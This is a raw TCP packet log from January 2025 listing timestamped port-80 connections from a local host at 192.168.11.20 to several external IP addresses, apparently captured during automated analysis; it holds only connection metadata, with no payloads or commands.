                                                                                                                                                                              Jan 11, 2025 03:56:08.682151079 CET8049776101.35.209.183192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:56:08.682285070 CET4977680192.168.11.20101.35.209.183
                                                                                                                                                                              Jan 11, 2025 03:56:09.863970995 CET4977680192.168.11.20101.35.209.183
                                                                                                                                                                              Jan 11, 2025 03:56:10.880064964 CET4977780192.168.11.20101.35.209.183
                                                                                                                                                                              Jan 11, 2025 03:56:11.193212032 CET8049777101.35.209.183192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:56:11.193407059 CET4977780192.168.11.20101.35.209.183
                                                                                                                                                                              Jan 11, 2025 03:56:11.197020054 CET4977780192.168.11.20101.35.209.183
                                                                                                                                                                              Jan 11, 2025 03:56:11.197084904 CET4977780192.168.11.20101.35.209.183
                                                                                                                                                                              Jan 11, 2025 03:56:11.510345936 CET8049777101.35.209.183192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:56:11.510584116 CET8049777101.35.209.183192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:56:11.510613918 CET8049777101.35.209.183192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:56:11.510633945 CET8049777101.35.209.183192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:56:11.510909081 CET8049777101.35.209.183192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:56:11.510946989 CET8049777101.35.209.183192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:56:11.510968924 CET8049777101.35.209.183192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:56:11.511147022 CET4977780192.168.11.20101.35.209.183
                                                                                                                                                                              Jan 11, 2025 03:56:12.707052946 CET4977780192.168.11.20101.35.209.183
                                                                                                                                                                              Jan 11, 2025 03:56:13.723488092 CET4977880192.168.11.20101.35.209.183
                                                                                                                                                                              Jan 11, 2025 03:56:14.027865887 CET8049778101.35.209.183192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:56:14.028179884 CET4977880192.168.11.20101.35.209.183
                                                                                                                                                                              Jan 11, 2025 03:56:14.030600071 CET4977880192.168.11.20101.35.209.183
                                                                                                                                                                              Jan 11, 2025 03:56:14.333422899 CET8049778101.35.209.183192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:56:14.333808899 CET8049778101.35.209.183192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:56:14.333863974 CET8049778101.35.209.183192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:56:14.334122896 CET4977880192.168.11.20101.35.209.183
                                                                                                                                                                              Jan 11, 2025 03:56:14.334753990 CET4977880192.168.11.20101.35.209.183
                                                                                                                                                                              Jan 11, 2025 03:56:14.638403893 CET8049778101.35.209.183192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:56:19.743594885 CET4977980192.168.11.20154.23.178.231
                                                                                                                                                                              Jan 11, 2025 03:56:20.048332930 CET8049779154.23.178.231192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:56:20.048496008 CET4977980192.168.11.20154.23.178.231
                                                                                                                                                                              Jan 11, 2025 03:56:20.052020073 CET4977980192.168.11.20154.23.178.231
                                                                                                                                                                              Jan 11, 2025 03:56:20.356772900 CET8049779154.23.178.231192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:56:20.357069969 CET8049779154.23.178.231192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:56:20.357203007 CET4977980192.168.11.20154.23.178.231
                                                                                                                                                                              Jan 11, 2025 03:56:21.564495087 CET4977980192.168.11.20154.23.178.231
                                                                                                                                                                              Jan 11, 2025 03:56:22.580616951 CET4978080192.168.11.20154.23.178.231
                                                                                                                                                                              Jan 11, 2025 03:56:22.885245085 CET8049780154.23.178.231192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:56:22.885418892 CET4978080192.168.11.20154.23.178.231
                                                                                                                                                                              Jan 11, 2025 03:56:22.888964891 CET4978080192.168.11.20154.23.178.231
                                                                                                                                                                              Jan 11, 2025 03:56:23.193686008 CET8049780154.23.178.231192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:56:23.193897009 CET8049780154.23.178.231192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:56:23.194046021 CET4978080192.168.11.20154.23.178.231
                                                                                                                                                                              Jan 11, 2025 03:56:24.391966105 CET4978080192.168.11.20154.23.178.231
                                                                                                                                                                              Jan 11, 2025 03:56:25.408330917 CET4978180192.168.11.20154.23.178.231
                                                                                                                                                                              Jan 11, 2025 03:56:25.713776112 CET8049781154.23.178.231192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:56:25.713970900 CET4978180192.168.11.20154.23.178.231
                                                                                                                                                                              Jan 11, 2025 03:56:25.718099117 CET4978180192.168.11.20154.23.178.231
                                                                                                                                                                              Jan 11, 2025 03:56:25.718147993 CET4978180192.168.11.20154.23.178.231
                                                                                                                                                                              Jan 11, 2025 03:56:26.023358107 CET8049781154.23.178.231192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:56:26.023509979 CET8049781154.23.178.231192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:56:26.023819923 CET8049781154.23.178.231192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:56:26.024060965 CET8049781154.23.178.231192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:56:26.024257898 CET8049781154.23.178.231192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:56:26.024403095 CET4978180192.168.11.20154.23.178.231
                                                                                                                                                                              Jan 11, 2025 03:56:27.219715118 CET4978180192.168.11.20154.23.178.231
                                                                                                                                                                              Jan 11, 2025 03:56:28.235860109 CET4978280192.168.11.20154.23.178.231
                                                                                                                                                                              Jan 11, 2025 03:56:28.540479898 CET8049782154.23.178.231192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:56:28.540646076 CET4978280192.168.11.20154.23.178.231
                                                                                                                                                                              Jan 11, 2025 03:56:28.543059111 CET4978280192.168.11.20154.23.178.231
                                                                                                                                                                              Jan 11, 2025 03:56:28.847678900 CET8049782154.23.178.231192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:56:28.847944975 CET8049782154.23.178.231192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:56:28.848207951 CET4978280192.168.11.20154.23.178.231
                                                                                                                                                                              Jan 11, 2025 03:56:28.848885059 CET4978280192.168.11.20154.23.178.231
                                                                                                                                                                              Jan 11, 2025 03:56:29.153404951 CET8049782154.23.178.231192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:56:34.035521030 CET4978380192.168.11.20208.91.197.39
                                                                                                                                                                              Jan 11, 2025 03:56:34.177002907 CET8049783208.91.197.39192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:56:34.177206993 CET4978380192.168.11.20208.91.197.39
                                                                                                                                                                              Jan 11, 2025 03:56:34.180754900 CET4978380192.168.11.20208.91.197.39
                                                                                                                                                                              Jan 11, 2025 03:56:34.322137117 CET8049783208.91.197.39192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:56:36.702521086 CET4978480192.168.11.20208.91.197.39
                                                                                                                                                                              Jan 11, 2025 03:56:36.844116926 CET8049784208.91.197.39192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:56:36.844363928 CET4978480192.168.11.20208.91.197.39
                                                                                                                                                                              Jan 11, 2025 03:56:36.847908974 CET4978480192.168.11.20208.91.197.39
                                                                                                                                                                              Jan 11, 2025 03:56:36.989562988 CET8049784208.91.197.39192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:56:39.373825073 CET4978580192.168.11.20208.91.197.39
                                                                                                                                                                              Jan 11, 2025 03:56:39.515198946 CET8049785208.91.197.39192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:56:39.515372038 CET4978580192.168.11.20208.91.197.39
                                                                                                                                                                              Jan 11, 2025 03:56:39.518979073 CET4978580192.168.11.20208.91.197.39
                                                                                                                                                                              Jan 11, 2025 03:56:39.519007921 CET4978580192.168.11.20208.91.197.39
                                                                                                                                                                              Jan 11, 2025 03:56:39.660450935 CET8049785208.91.197.39192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:56:42.045115948 CET4978680192.168.11.20208.91.197.39
                                                                                                                                                                              Jan 11, 2025 03:56:42.186781883 CET8049786208.91.197.39192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:56:42.187024117 CET4978680192.168.11.20208.91.197.39
                                                                                                                                                                              Jan 11, 2025 03:56:42.189434052 CET4978680192.168.11.20208.91.197.39
                                                                                                                                                                              Jan 11, 2025 03:56:42.339493036 CET8049786208.91.197.39192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:56:43.045331001 CET8049786208.91.197.39192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:56:43.045351028 CET8049786208.91.197.39192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:56:43.045366049 CET8049786208.91.197.39192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:56:43.045553923 CET4978680192.168.11.20208.91.197.39
                                                                                                                                                                              Jan 11, 2025 03:56:43.045620918 CET8049786208.91.197.39192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:56:43.045666933 CET8049786208.91.197.39192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:56:43.045799017 CET8049786208.91.197.39192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:56:43.045804024 CET4978680192.168.11.20208.91.197.39
                                                                                                                                                                              Jan 11, 2025 03:56:43.045914888 CET8049786208.91.197.39192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:56:43.046039104 CET4978680192.168.11.20208.91.197.39
                                                                                                                                                                              Jan 11, 2025 03:56:43.046042919 CET8049786208.91.197.39192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:56:43.046245098 CET4978680192.168.11.20208.91.197.39
                                                                                                                                                                              Jan 11, 2025 03:56:43.106545925 CET8049786208.91.197.39192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:56:43.152916908 CET4978680192.168.11.20208.91.197.39
                                                                                                                                                                              Jan 11, 2025 03:56:43.193376064 CET8049786208.91.197.39192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:56:43.193422079 CET8049786208.91.197.39192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:56:43.193455935 CET8049786208.91.197.39192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:56:43.193672895 CET4978680192.168.11.20208.91.197.39
                                                                                                                                                                              Jan 11, 2025 03:56:43.193799019 CET8049786208.91.197.39192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:56:43.193844080 CET8049786208.91.197.39192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:56:43.194068909 CET4978680192.168.11.20208.91.197.39
                                                                                                                                                                              Jan 11, 2025 03:56:43.194116116 CET8049786208.91.197.39192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:56:43.194478035 CET4978680192.168.11.20208.91.197.39
                                                                                                                                                                              Jan 11, 2025 03:56:43.303419113 CET8049786208.91.197.39192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:56:43.303473949 CET8049786208.91.197.39192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:56:43.303769112 CET4978680192.168.11.20208.91.197.39
                                                                                                                                                                              Jan 11, 2025 03:56:43.343056917 CET8049786208.91.197.39192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:56:43.343291044 CET8049786208.91.197.39192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:56:43.343346119 CET8049786208.91.197.39192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:56:43.343395948 CET8049786208.91.197.39192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:56:43.343576908 CET4978680192.168.11.20208.91.197.39
                                                                                                                                                                              Jan 11, 2025 03:56:43.343578100 CET4978680192.168.11.20208.91.197.39
                                                                                                                                                                              Jan 11, 2025 03:56:43.343624115 CET8049786208.91.197.39192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:56:43.343745947 CET8049786208.91.197.39192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:56:43.344083071 CET4978680192.168.11.20208.91.197.39
                                                                                                                                                                              Jan 11, 2025 03:56:43.454478979 CET8049786208.91.197.39192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:56:43.454499960 CET8049786208.91.197.39192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:56:43.454793930 CET4978680192.168.11.20208.91.197.39
                                                                                                                                                                              Jan 11, 2025 03:56:43.493515968 CET8049786208.91.197.39192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:56:43.493619919 CET8049786208.91.197.39192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:56:43.493719101 CET8049786208.91.197.39192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:56:43.493813038 CET8049786208.91.197.39192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:56:43.493928909 CET8049786208.91.197.39192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:56:43.493935108 CET4978680192.168.11.20208.91.197.39
                                                                                                                                                                              Jan 11, 2025 03:56:43.494007111 CET4978680192.168.11.20208.91.197.39
                                                                                                                                                                              Jan 11, 2025 03:56:43.494010925 CET8049786208.91.197.39192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:56:43.494090080 CET8049786208.91.197.39192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:56:43.494263887 CET4978680192.168.11.20208.91.197.39
                                                                                                                                                                              Jan 11, 2025 03:56:43.543416977 CET4978680192.168.11.20208.91.197.39
                                                                                                                                                                              Jan 11, 2025 03:56:43.602384090 CET8049786208.91.197.39192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:56:43.602442026 CET8049786208.91.197.39192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:56:43.602762938 CET4978680192.168.11.20208.91.197.39
                                                                                                                                                                              Jan 11, 2025 03:56:43.644560099 CET8049786208.91.197.39192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:56:43.644618034 CET8049786208.91.197.39192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:56:43.644660950 CET8049786208.91.197.39192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:56:43.644911051 CET8049786208.91.197.39192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:56:43.644958973 CET8049786208.91.197.39192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:56:43.644967079 CET4978680192.168.11.20208.91.197.39
                                                                                                                                                                              Jan 11, 2025 03:56:43.645210028 CET4978680192.168.11.20208.91.197.39
                                                                                                                                                                              Jan 11, 2025 03:56:43.645987034 CET4978680192.168.11.20208.91.197.39
                                                                                                                                                                              Jan 11, 2025 03:56:43.787671089 CET8049786208.91.197.39192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:56:48.827481031 CET4978780192.168.11.2043.205.198.29
                                                                                                                                                                              Jan 11, 2025 03:56:49.173650980 CET804978743.205.198.29192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:56:49.173894882 CET4978780192.168.11.2043.205.198.29
                                                                                                                                                                              Jan 11, 2025 03:56:49.177357912 CET4978780192.168.11.2043.205.198.29
                                                                                                                                                                              Jan 11, 2025 03:56:49.523403883 CET804978743.205.198.29192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:56:49.523633003 CET804978743.205.198.29192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:56:49.523641109 CET804978743.205.198.29192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:56:49.523833036 CET4978780192.168.11.2043.205.198.29
                                                                                                                                                                              Jan 11, 2025 03:56:50.683136940 CET4978780192.168.11.2043.205.198.29
                                                                                                                                                                              Jan 11, 2025 03:56:51.702231884 CET4978880192.168.11.2043.205.198.29
                                                                                                                                                                              Jan 11, 2025 03:56:52.048407078 CET804978843.205.198.29192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:56:52.048593998 CET4978880192.168.11.2043.205.198.29
                                                                                                                                                                              Jan 11, 2025 03:56:52.052154064 CET4978880192.168.11.2043.205.198.29
                                                                                                                                                                              Jan 11, 2025 03:56:52.398060083 CET804978843.205.198.29192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:56:52.406898022 CET804978843.205.198.29192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:56:52.406908035 CET804978843.205.198.29192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:56:52.407064915 CET4978880192.168.11.2043.205.198.29
                                                                                                                                                                              Jan 11, 2025 03:56:53.557496071 CET4978880192.168.11.2043.205.198.29
                                                                                                                                                                              Jan 11, 2025 03:56:54.573682070 CET4978980192.168.11.2043.205.198.29
                                                                                                                                                                              Jan 11, 2025 03:56:54.923696041 CET804978943.205.198.29192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:56:54.923888922 CET4978980192.168.11.2043.205.198.29
                                                                                                                                                                              Jan 11, 2025 03:56:54.927495956 CET4978980192.168.11.2043.205.198.29
                                                                                                                                                                              Jan 11, 2025 03:56:54.927582026 CET4978980192.168.11.2043.205.198.29
                                                                                                                                                                              Jan 11, 2025 03:56:55.277586937 CET804978943.205.198.29192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:56:55.277880907 CET804978943.205.198.29192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:56:55.277935982 CET804978943.205.198.29192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:56:55.278003931 CET804978943.205.198.29192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:56:55.278367043 CET804978943.205.198.29192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:56:55.278419971 CET804978943.205.198.29192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:56:55.278593063 CET4978980192.168.11.2043.205.198.29
                                                                                                                                                                              Jan 11, 2025 03:56:56.431884050 CET4978980192.168.11.2043.205.198.29
                                                                                                                                                                              Jan 11, 2025 03:56:57.448182106 CET4979080192.168.11.2043.205.198.29
                                                                                                                                                                              Jan 11, 2025 03:56:57.794816017 CET804979043.205.198.29192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:56:57.795197010 CET4979080192.168.11.2043.205.198.29
                                                                                                                                                                              Jan 11, 2025 03:56:57.798068047 CET4979080192.168.11.2043.205.198.29
                                                                                                                                                                              Jan 11, 2025 03:56:58.144840956 CET804979043.205.198.29192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:56:58.144905090 CET804979043.205.198.29192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:56:58.145133018 CET804979043.205.198.29192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:56:58.145411015 CET4979080192.168.11.2043.205.198.29
                                                                                                                                                                              Jan 11, 2025 03:56:58.146027088 CET4979080192.168.11.2043.205.198.29
                                                                                                                                                                              Jan 11, 2025 03:56:58.492656946 CET804979043.205.198.29192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:57:03.276894093 CET4979180192.168.11.20104.21.40.167
                                                                                                                                                                              Jan 11, 2025 03:57:03.396260023 CET8049791104.21.40.167192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:57:03.396436930 CET4979180192.168.11.20104.21.40.167
                                                                                                                                                                              Jan 11, 2025 03:57:03.399947882 CET4979180192.168.11.20104.21.40.167
                                                                                                                                                                              Jan 11, 2025 03:57:03.519207001 CET8049791104.21.40.167192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:57:04.914307117 CET4979180192.168.11.20104.21.40.167
                                                                                                                                                                              Jan 11, 2025 03:57:05.034486055 CET8049791104.21.40.167192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:57:05.034748077 CET4979180192.168.11.20104.21.40.167
                                                                                                                                                                              Jan 11, 2025 03:57:05.930489063 CET4979280192.168.11.20104.21.40.167
                                                                                                                                                                              Jan 11, 2025 03:57:06.049793005 CET8049792104.21.40.167192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:57:06.049962997 CET4979280192.168.11.20104.21.40.167
                                                                                                                                                                              Jan 11, 2025 03:57:06.053541899 CET4979280192.168.11.20104.21.40.167
                                                                                                                                                                              Jan 11, 2025 03:57:06.172950983 CET8049792104.21.40.167192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:57:07.554420948 CET4979280192.168.11.20104.21.40.167
                                                                                                                                                                              Jan 11, 2025 03:57:07.674261093 CET8049792104.21.40.167192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:57:07.674468994 CET4979280192.168.11.20104.21.40.167
                                                                                                                                                                              Jan 11, 2025 03:57:08.570641041 CET4979380192.168.11.20104.21.40.167
                                                                                                                                                                              Jan 11, 2025 03:57:08.690020084 CET8049793104.21.40.167192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:57:08.690165997 CET4979380192.168.11.20104.21.40.167
                                                                                                                                                                              Jan 11, 2025 03:57:08.693780899 CET4979380192.168.11.20104.21.40.167
                                                                                                                                                                              Jan 11, 2025 03:57:08.693861961 CET4979380192.168.11.20104.21.40.167
                                                                                                                                                                              Jan 11, 2025 03:57:08.813244104 CET8049793104.21.40.167192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:57:08.813489914 CET8049793104.21.40.167192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:57:08.813679934 CET8049793104.21.40.167192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:57:08.813714027 CET8049793104.21.40.167192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:57:08.814039946 CET8049793104.21.40.167192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:57:08.814080954 CET8049793104.21.40.167192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:57:10.194586039 CET4979380192.168.11.20104.21.40.167
                                                                                                                                                                              Jan 11, 2025 03:57:10.314448118 CET8049793104.21.40.167192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:57:10.314671040 CET4979380192.168.11.20104.21.40.167
                                                                                                                                                                              Jan 11, 2025 03:57:11.210896969 CET4979480192.168.11.20104.21.40.167
                                                                                                                                                                              Jan 11, 2025 03:57:11.329643965 CET8049794104.21.40.167192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:57:11.329912901 CET4979480192.168.11.20104.21.40.167
                                                                                                                                                                              Jan 11, 2025 03:57:11.332329035 CET4979480192.168.11.20104.21.40.167
                                                                                                                                                                              Jan 11, 2025 03:57:11.451311111 CET8049794104.21.40.167192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:57:50.188285112 CET8049794104.21.40.167192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:57:50.189218998 CET8049794104.21.40.167192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:57:50.189413071 CET4979480192.168.11.20104.21.40.167
                                                                                                                                                                              Jan 11, 2025 03:57:50.190006018 CET4979480192.168.11.20104.21.40.167
                                                                                                                                                                              Jan 11, 2025 03:57:50.308561087 CET8049794104.21.40.167192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:57:55.343739986 CET4979580192.168.11.20172.67.167.146
                                                                                                                                                                              Jan 11, 2025 03:57:55.462213993 CET8049795172.67.167.146192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:57:55.462455034 CET4979580192.168.11.20172.67.167.146
                                                                                                                                                                              Jan 11, 2025 03:57:55.465972900 CET4979580192.168.11.20172.67.167.146
                                                                                                                                                                              Jan 11, 2025 03:57:55.584404945 CET8049795172.67.167.146192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:57:55.925916910 CET8049795172.67.167.146192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:57:55.925949097 CET8049795172.67.167.146192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:57:55.926131010 CET4979580192.168.11.20172.67.167.146
                                                                                                                                                                              Jan 11, 2025 03:57:55.926312923 CET8049795172.67.167.146192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:57:55.926493883 CET4979580192.168.11.20172.67.167.146
                                                                                                                                                                              Jan 11, 2025 03:57:56.981192112 CET4979580192.168.11.20172.67.167.146
                                                                                                                                                                              Jan 11, 2025 03:57:57.997299910 CET4979680192.168.11.20172.67.167.146
                                                                                                                                                                              Jan 11, 2025 03:57:58.116880894 CET8049796172.67.167.146192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:57:58.117157936 CET4979680192.168.11.20172.67.167.146
                                                                                                                                                                              Jan 11, 2025 03:57:58.120737076 CET4979680192.168.11.20172.67.167.146
                                                                                                                                                                              Jan 11, 2025 03:57:58.240237951 CET8049796172.67.167.146192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:57:58.584578037 CET8049796172.67.167.146192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:57:58.584588051 CET8049796172.67.167.146192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:57:58.584753990 CET4979680192.168.11.20172.67.167.146
                                                                                                                                                                              Jan 11, 2025 03:57:58.584825039 CET8049796172.67.167.146192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:57:58.585589886 CET8049796172.67.167.146192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:57:58.585805893 CET4979680192.168.11.20172.67.167.146
                                                                                                                                                                              Jan 11, 2025 03:57:59.636837006 CET4979680192.168.11.20172.67.167.146
                                                                                                                                                                              Jan 11, 2025 03:58:00.654247999 CET4979780192.168.11.20172.67.167.146
                                                                                                                                                                              Jan 11, 2025 03:58:00.772633076 CET8049797172.67.167.146192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:00.772802114 CET4979780192.168.11.20172.67.167.146
                                                                                                                                                                              Jan 11, 2025 03:58:00.776454926 CET4979780192.168.11.20172.67.167.146
                                                                                                                                                                              Jan 11, 2025 03:58:00.776480913 CET4979780192.168.11.20172.67.167.146
                                                                                                                                                                              Jan 11, 2025 03:58:00.776557922 CET4979780192.168.11.20172.67.167.146
                                                                                                                                                                              Jan 11, 2025 03:58:00.894871950 CET8049797172.67.167.146192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:00.895044088 CET8049797172.67.167.146192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:00.895287037 CET8049797172.67.167.146192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:00.895549059 CET8049797172.67.167.146192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:00.895559072 CET8049797172.67.167.146192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:01.255726099 CET8049797172.67.167.146192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:01.255745888 CET8049797172.67.167.146192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:01.255964041 CET8049797172.67.167.146192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:01.255990982 CET4979780192.168.11.20172.67.167.146
                                                                                                                                                                              Jan 11, 2025 03:58:01.256238937 CET4979780192.168.11.20172.67.167.146
                                                                                                                                                                              Jan 11, 2025 03:58:02.292463064 CET4979780192.168.11.20172.67.167.146
                                                                                                                                                                              Jan 11, 2025 03:58:03.308619976 CET4979880192.168.11.20172.67.167.146
                                                                                                                                                                              Jan 11, 2025 03:58:03.426992893 CET8049798172.67.167.146192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:03.427242994 CET4979880192.168.11.20172.67.167.146
                                                                                                                                                                              Jan 11, 2025 03:58:03.429758072 CET4979880192.168.11.20172.67.167.146
                                                                                                                                                                              Jan 11, 2025 03:58:03.548049927 CET8049798172.67.167.146192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:03.907243967 CET8049798172.67.167.146192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:03.907347918 CET8049798172.67.167.146192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:03.907572985 CET4979880192.168.11.20172.67.167.146
                                                                                                                                                                              Jan 11, 2025 03:58:03.908004999 CET8049798172.67.167.146192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:03.908195972 CET4979880192.168.11.20172.67.167.146
                                                                                                                                                                              Jan 11, 2025 03:58:03.908795118 CET4979880192.168.11.20172.67.167.146
                                                                                                                                                                              Jan 11, 2025 03:58:04.026926041 CET8049798172.67.167.146192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:09.174531937 CET4979980192.168.11.2074.48.143.82
                                                                                                                                                                              Jan 11, 2025 03:58:09.345926046 CET804979974.48.143.82192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:09.346298933 CET4979980192.168.11.2074.48.143.82
                                                                                                                                                                              Jan 11, 2025 03:58:09.351660967 CET4979980192.168.11.2074.48.143.82
                                                                                                                                                                              Jan 11, 2025 03:58:09.523060083 CET804979974.48.143.82192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:09.523541927 CET804979974.48.143.82192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:09.523552895 CET804979974.48.143.82192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:09.523560047 CET804979974.48.143.82192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:09.523718119 CET4979980192.168.11.2074.48.143.82
                                                                                                                                                                              Jan 11, 2025 03:58:10.853116989 CET4979980192.168.11.2074.48.143.82
                                                                                                                                                                              Jan 11, 2025 03:58:11.869245052 CET4980080192.168.11.2074.48.143.82
                                                                                                                                                                              Jan 11, 2025 03:58:12.040469885 CET804980074.48.143.82192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:12.040740013 CET4980080192.168.11.2074.48.143.82
                                                                                                                                                                              Jan 11, 2025 03:58:12.044322968 CET4980080192.168.11.2074.48.143.82
                                                                                                                                                                              Jan 11, 2025 03:58:12.215655088 CET804980074.48.143.82192.168.11.20
